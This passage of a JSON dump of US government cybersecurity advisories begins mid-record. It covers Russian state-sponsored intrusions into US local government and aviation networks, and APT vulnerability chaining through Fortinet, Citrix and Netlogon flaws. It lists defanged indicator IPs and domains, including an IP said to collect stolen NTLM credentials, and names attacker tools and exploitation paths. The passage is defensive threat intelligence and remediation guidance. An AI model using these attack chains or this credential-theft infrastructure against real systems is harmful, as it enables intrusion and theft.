Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:33:59", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques _\n\nThis joint cybersecurity advisory\u2014written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)\u2014provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).\n\nSince at least September 2020, a Russian state-sponsored APT actor\u2014known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting\u2014has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.\n\nThe Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:\n\n * Sensitive network configurations and passwords.\n * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).\n * IT instructions, such as requesting password resets.\n * Vendors and purchasing information.\n * Printing access badges.\n\nTo date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.\n\nAs this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.\n\n * Click here for a PDF version of this report.\n * Click here for a STIX package of IOCs.\n\n#### U.S. Heat Map of Activity\n\n[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.\n\n**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto: info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.\n\n**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.\n\n### Technical Details\n\nThe FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).\n\nThe actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]). The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).\n\nOrganizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. As the APT actors likely have\u2014or will\u2014establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.\n\nRefer to AA20-296A.stix for a downloadable copy of IOCs.\n\n#### Network Defense-in-Depth\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.\n\n * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n\n| [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | \n\n * Exim versions 4.87\u20134.91\n| [Exim page for CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n[Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n * Follow Microsoft\u2019s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.\n * If appropriate for your organization\u2019s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.\n * Implement the prevention, detection, and mitigation strategies outlined in: \n * CISA Alert [TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 \u2013 Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).\n * Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.\n * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.\n * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. All other locations should be disallowed unless an exception is granted.\n * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.\n\n#### Comprehensive Account Resets\n\nFor accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT \u201cGolden Tickets\u201d may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise\u2014as well as in Azure-hosted\u2014AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket `(krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the` krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n#### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.\n * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor **network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### Resources\n\n * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations \u2013 <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>\n * CISA Activity Alert CVE-2019-19781 \u2013 <https://us-cert/cisa.gov/ncas/alerts/aa20-031a>\n * CISA Vulnerability Bulletin \u2013 <https://us-cert/cisa.gov/ncas/bulletins/SB19-161>\n * CISA Current Activity \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>\n * Citrix Directory Traversal Bug (CVE-2019-19781) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * Microsoft Exchange remote code execution flaw (CVE-2020-0688) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>\n * CVE-2018-13379 \u2013 [https://nvd.nist.gov/vuln/detail/CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379 >)\n * CVE-2020-1472 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>\n * CVE 2019-10149 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>\n * NCCIC/USCERT Alert TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance \u2013 [https://us-cert.cisa.gov/ncas/alerts/TA15-314A](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A >)\n * NCCIC/US-CERT publication on SMB Security Best Practices \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices> \n\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version|November 17, 2020: Added U.S. Heat Map of Activity|December 1, 2020: Added \"current as of\" date to U.S. Heat Map of Activity\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-12-01T12:00:00", "id": "AA20-296A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:11", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) 